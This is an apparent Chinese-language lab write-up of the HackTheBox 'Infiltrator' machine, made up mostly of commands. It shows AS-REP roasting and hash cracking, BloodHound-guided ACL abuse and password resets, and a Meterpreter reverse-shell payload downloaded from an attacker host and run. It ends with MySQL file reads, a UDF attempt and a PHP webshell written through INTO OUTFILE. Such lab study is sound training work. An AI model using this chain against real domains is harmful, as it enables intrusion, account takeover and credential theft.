HTB-Infiltrator:一文带你走进域渗透
字数 1096 2025-08-20 18:18:16
HTB-Infiltrator域渗透实战教学文档
1. 目标信息收集
1.1 端口扫描与识别
使用Nmap进行端口扫描,发现以下开放端口:
53/tcp - domain (DNS服务)
80/tcp - http (IIS 10.0)
88/tcp - kerberos-sec
135/tcp - msrpc
139/tcp - netbios-ssn
389/tcp - ldap (Active Directory)
445/tcp - microsoft-ds (SMB)
464/tcp - kpasswd5
593/tcp - ncacn_http (RPC over HTTP)
636/tcp - ldapssl
3268/tcp - globalcatLDAP
3269/tcp - globalcatLDAPssl
3389/tcp - ms-wbt-server (RDP)
5985/tcp - wsman (WinRM)
9389/tcp - adws
15220/tcp - unknown
15230/tcp - unknown
1.2 域名与主机识别
- 域名:
infiltrator.htb - 主机名:
dc01.infiltrator.htb - 操作系统:Windows Server 2019 (Build 17763)
2. 域渗透准备工作
2.1 DNS服务器配置
配置本地DNS服务器指向目标机器:
sudo vim /etc/resolv.conf
# 添加以下内容
nameserver 10.10.11.31
nameserver 192.168.122.1
验证DNS解析:
nslookup dc01.infiltrator.htb
3. WEB渗透与用户枚举
3.1 80端口信息收集
从网站页面提取团队成员信息:
curl -s http://dc01.infiltrator.htb | xmllint --html --xpath "//div/div/h4" -
提取的用户名列表:
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
3.2 构造域用户字典
使用awk生成可能的域用户名格式:
awk '{
name = $0
split(name, parts, " ")
first = tolower(parts[1])
last = tolower(parts[2])
print first "." last "@infiltrator.htb"
print first "_" last "@infiltrator.htb"
print substr(first, 1, 1) "." last "@infiltrator.htb"
print substr(first, 1, 1) "_" last "@infiltrator.htb"
}' username > AD_username
3.3 使用kerbrute枚举有效用户
kerbrute userenum -d infiltrator.htb AD_username
# 如果没有配置DNS,需要指定DC
kerbrute userenum -d infiltrator.htb AD_username --dc dc01.infiltrator.htb
验证的有效用户:
o.martinez@infiltrator.htb
d.anderson@infiltrator.htb
k.turner@infiltrator.htb
a.walker@infiltrator.htb
m.harris@infiltrator.htb
e.rodriguez@infiltrator.htb
l.clark@infiltrator.htb
4. Kerberos攻击与HASH破解
4.1 获取不需要预认证的用户HASH
impacket-GetNPUsers infiltrator.htb/ -usersfile AD_usr -outputfile outputusers.txt -no-pass
# 如果没有配置DNS
impacket-GetNPUsers infiltrator.htb/ -usersfile AD_usr -outputfile outputusers.txt -no-pass -dc-ip dc01.infiltrator.htb
发现l.clark@infiltrator.htb不需要预认证,获取到其HASH。
4.2 使用hashcat破解HASH
识别HASH类型:
hashcat l.clark@infiltrator.htb_hash
# 识别为18200类型 (Kerberos 5, etype 23, AS-REP)
破解HASH:
hashcat l.clark@infiltrator.htb_hash -a 0 -m 18200 /usr/share/wordlists/rockyou.txt
破解结果:
l.clark@infiltrator.htb:WAT?watismypass!
5. 横向移动与权限提升
5.1 尝试使用psexec
impacket-psexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb
5.2 使用bloodhound分析域结构
收集数据:
bloodhound-python -d infiltrator.htb -u d.anderson -p 'WAT?watismypass!' -c all -ns 10.10.11.31 --zip
发现攻击链:
D.ANDERSON@INFILTRATOR.HTB ---GenericAll--->MARKETING DIGITAL@INFILTRATOR.HTB
MARKETING DIGITAL@INFILTRATOR.HTB ---Contains--->E.RODRIGUEZ@INFILTRATOR.HTB
E.RODRIGUEZ@INFILTRATOR.HTB---addself--->CHIEFS MARKETING@INFILTRATOR.HTB
CHIEFS MARKETING@INFILTRATOR.HTB---forcechangepassword---> M.HARRIS@INFILTRATOR.HTB
5.3 执行攻击链
- 为d.anderson获取TGT:
impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb
export KRB5CCNAME=d.anderson.ccache
- 修改ACL让d.anderson获得对MARKETING DIGITAL的完全控制:
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb
- 重置e.rodriguez的密码:
python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "WAT?watismypass\!" set password "e.rodriguez" "QWEasd123@123"
- 将e.rodriguez添加到CHIEFS MARKETING组:
getTGT.py infiltrator.htb/"e.rodriguez":"QWEasd123@123" -dc-ip dc01.infiltrator.htb
export KRB5CCNAME=e.rodriguez.ccache
python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip 10.10.11.31 -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
- 重置m.harris的密码:
python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "e.rodriguez" -p "QWEasd123@123" set password "m.harris" "QWEasd123@123"
- 使用evil-winrm连接:
getTGT.py infiltrator.htb/m.harris:'QWEasd123@123' -dc-ip dc01.infiltrator.htb
export KRB5CCNAME=m.harris.ccache
evil-winrm -i dc01.infiltrator.htb -u m.harris -r infiltrator.htb
6. 权限维持
生成反向shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=9001 -f exe -o reverse.exe
启动HTTP服务器:
python -m http.server 80
在目标机器下载并执行:
wget http://10.10.16.2/reverse.exe -o reverse.exe
Start-Process -FilePath "reverse.exe" -WindowStyle Hidden
启动监听:
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.16.2; set lport 9001; exploit -j"
7. 提权与最终渗透
7.1 使用PEASS-NG枚举提权路径
start /b winPEASx64.exe >> output.txt
发现可疑进程:
OMServerService
outputmessenger_httpd
outputmessenger_mysqld
7.2 MySQL提权
- 端口转发MySQL服务:
portfwd add -l 53366 -L 0.0.0.0 -p 14406 -r 10.10.11.31
- 连接MySQL:
mysql -h 127.0.0.1 -uroot -P 53366 -p
# 密码为ibWijteig5
- 读取敏感文件:
SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');
- 尝试UDF提权(失败):
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C:\\Users\\M.harris\\lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
7.3 Apache提权
- 端口转发Apache服务:
portfwd add -l 14126 -L 0.0.0.0 -p 14126 -r 10.10.11.31
- 通过MySQL写入webshell:
select "<?php echo `whoami`;?>" INTO OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\whoami.php";
- 访问webshell获取system权限:
http://127.0.0.1:14126/whoami.php
8. 总结
本次渗透测试完整流程:
- 信息收集与用户枚举
- Kerberos攻击获取HASH并破解
- 使用bloodhound分析域结构
- 通过ACL滥用实现权限提升
- 权限维持与横向移动
- 通过MySQL和Apache服务获取最终权限
关键点:
- 正确配置DNS对域渗透至关重要
- Kerberos预认证漏洞是常见的攻击入口
- bloodhound是分析域结构的强大工具
- ACL滥用是域渗透中的常见技术
- 服务配置不当可能导致直接提权